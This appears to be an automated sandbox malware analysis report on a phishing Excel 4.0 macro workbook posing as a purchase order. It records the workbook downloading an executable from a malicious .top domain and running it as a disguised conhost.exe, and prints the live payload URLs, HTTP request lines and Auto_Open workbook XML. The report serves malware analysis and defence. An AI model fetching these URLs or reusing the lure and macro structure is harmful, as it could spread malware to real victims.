Loading ...

Play interactive tourEdit tour

Analysis Report PURCHASE ORDER No-17-11-98543.xlsm

Overview

General Information

Sample Name:PURCHASE ORDER No-17-11-98543.xlsm
Analysis ID:319311
MD5:921ac551fe8d88c2185f39f0e777eabd
SHA1:40702dc4f773cfa3fcf03c62ec810ba3f5e6b72d
SHA256:b1660b65514182bf97a767caa264b0500ef14692e69dae6ddca344591e7e016d
Tags:xlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to detect sleep reduction / modifications
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: System File Execution Location Anomaly
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1756 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • conhost.exe (PID: 2512 cmdline: 'C:\ETTER\dAneDFma\conhost.exe' MD5: F5ECCDDC7EE3DF74B79DF21D04DD56A1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x58de0:$s1: 7++/epp
00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x58b70:$xo1: /\x0D\x18\x0B\x0E\x0E\x03MWLR
  • 0x58c90:$xo1: ?\x1D\x08\x1B\x1E\x1E\x13]G\B
00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x599c0:$xo1: /\x0D\x18\x0B\x0E\x0E\x03MWLR
  • 0x59ae0:$xo1: ?\x1D\x08\x1B\x1E\x1E\x13]G\B
00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x31849:$xo1: /\x0D\x18\x0B\x0E\x0E\x03MWLR
  • 0x31966:$xo1: ?\x1D\x08\x1B\x1E\x1E\x13]G\B
00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x5a7e0:$s1: 7++/epp
  • 0x60160:$s1: http://
  • 0x60160:$f1: http://
Click to see the 1 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
3.2.conhost.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x58de0:$s1: 7++/epp
3.2.conhost.exe.400000.0.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x58b70:$xo1: /\x0D\x18\x0B\x0E\x0E\x03MWLR
  • 0x58c90:$xo1: ?\x1D\x08\x1B\x1E\x1E\x13]G\B
3.2.conhost.exe.400000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x5a7e0:$s1: 7++/epp
  • 0x60160:$s1: http://
  • 0x60160:$f1: http://
3.2.conhost.exe.400000.0.raw.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x5a570:$xo1: /\x0D\x18\x0B\x0E\x0E\x03MWLR
  • 0x5a690:$xo1: ?\x1D\x08\x1B\x1E\x1E\x13]G\B
3.3.conhost.exe.580000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x58de0:$s1: 7++/epp
Click to see the 3 entries

Sigma Overview

System Summary:

barindex
Sigma detected: System File Execution Location AnomalyShow sources
Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\ETTER\dAneDFma\conhost.exe' , CommandLine: 'C:\ETTER\dAneDFma\conhost.exe' , CommandLine|base64offset|contains: , Image: C:\ETTER\dAneDFma\conhost.exe, NewProcessName: C:\ETTER\dAneDFma\conhost.exe, OriginalFileName: C:\ETTER\dAneDFma\conhost.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1756, ProcessCommandLine: 'C:\ETTER\dAneDFma\conhost.exe' , ProcessId: 2512

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: gvbmkhvnyib.topVirustotal: Detection: 6%Perma Link
Source: gvbmkhvnyib.topVirustotal: Detection: 6%Perma Link
Source: http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloaderVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\ETTER\dAneDFma\conhost.exeVirustotal: Detection: 29%Perma Link
Source: C:\ETTER\dAneDFma\conhost.exeReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderReversingLabs: Detection: 22%
Source: C:\ETTER\dAneDFma\conhost.exeVirustotal: Detection: 29%Perma Link
Source: C:\ETTER\dAneDFma\conhost.exeReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted fileShow sources
Source: PURCHASE ORDER No-17-11-98543.xlsmVirustotal: Detection: 9%Perma Link
Source: PURCHASE ORDER No-17-11-98543.xlsmVirustotal: Detection: 9%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\ETTER\dAneDFma\conhost.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJoe Sandbox ML: detected
Source: C:\ETTER\dAneDFma\conhost.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJoe Sandbox ML: detected
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043FF74 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005501C4 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043FF74 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005501C4 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: conhost[1].triumphloader.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: conhost[1].triumphloader.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ETTER\dAneDFma\conhost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ETTER\dAneDFma\conhost.exe
Source: excel.exeMemory has grown: Private usage: 4MB later: 66MB
Source: excel.exeMemory has grown: Private usage: 4MB later: 66MB
Source: global trafficDNS query: name: gvbmkhvnyib.top
Source: global trafficDNS query: name: gvbmkhvnyib.top
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 06:57:22 GMTContent-Length: 297472Connection: keep-aliveLast-Modified: Wed, 18 Nov 2020 00:57:27 GMTETag: "48a00-5b457185761f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 06:57:22 GMTContent-Length: 297472Connection: keep-aliveLast-Modified: Wed, 18 Nov 2020 00:57:27 GMTETag: "48a00-5b457185761f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox ViewASN Name: IQHOSTRU IQHOSTRU
Source: Joe Sandbox ViewASN Name: IQHOSTRU IQHOSTRU
Source: global trafficHTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.pngJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.pngJump to behavior
Source: global trafficHTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: gvbmkhvnyib.top
Source: unknownDNS traffic detected: queries for: gvbmkhvnyib.top
Source: conhost.exeString found in binary or memory: http://4cnx9s25gsvw.top/syZsNnTNps.vx
Source: conhost.exeString found in binary or memory: http://4cnx9s25gsvw.top/syZsNnTNps.vx

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Content X A' - (" & " A A B C D E F G H I J K L M N O P Q R S : 1 : 4 5 6 C : con
Source: Screenshot number: 12Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S 1=1 ' 301 302 303 30
Source: Screenshot number: 8Screenshot OCR: Enable Content X A' - (" & " A A B C D E F G H I J K L M N O P Q R S : 1 : 4 5 6 C : con
Source: Screenshot number: 12Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S 1=1 ' 301 302 303 30
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: PURCHASE ORDER No-17-11-98543.xlsmInitial sample: Sheet size: 137151
Source: PURCHASE ORDER No-17-11-98543.xlsmInitial sample: Sheet size: 137151
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\ETTER\dAneDFma\conhost.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\ETTER\dAneDFma\conhost.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\ETTER\dAneDFma\conhost.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\ETTER\dAneDFma\conhost.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00409B83 NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00409B83 NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0041148C
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043A17C
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004421A5
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434501
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040E599
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043E6A9
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434735
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00444797
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434969
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042AAC4
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434BD0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00430C60
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042EC6A
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042AE36
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B0E0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B3A7
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B662
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042BA70
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00439C4D
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00439D71
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054A3CC
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005523F5
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544751
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544985
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00538A58
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544BB9
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0053AD14
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544E20
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00540EB0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0053EEBA
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0041148C
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043A17C
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004421A5
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434501
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040E599
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043E6A9
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434735
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00444797
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434969
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042AAC4
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00434BD0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00430C60
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042EC6A
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042AE36
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B0E0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B3A7
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042B662
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042BA70
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00439C4D
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00439D71
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054A3CC
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005523F5
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544751
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544985
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00538A58
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544BB9
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0053AD14
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00544E20
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00540EB0
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0053EEBA
Source: workbook.xmlBinary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews><sheets><sheet name="DocuSign" sheetId="20" r:id="rId1"/><sheet name="ProtectList1" sheetId="21" r:id="rId2"/><sheet name="ProtectList2" sheetId="19" r:id="rId3"/><sheet name="ProtectList3" sheetId="22" r:id="rId4"/></sheets><definedNames><definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName><definedName name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName></definedNames><calcPr calcId="152511"/></workbook>
Source: workbook.xmlBinary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews><sheets><sheet name="DocuSign" sheetId="20" r:id="rId1"/><sheet name="ProtectList1" sheetId="21" r:id="rId2"/><sheet name="ProtectList2" sheetId="19" r:id="rId3"/><sheet name="ProtectList3" sheetId="22" r:id="rId4"/></sheets><definedNames><definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName><definedName 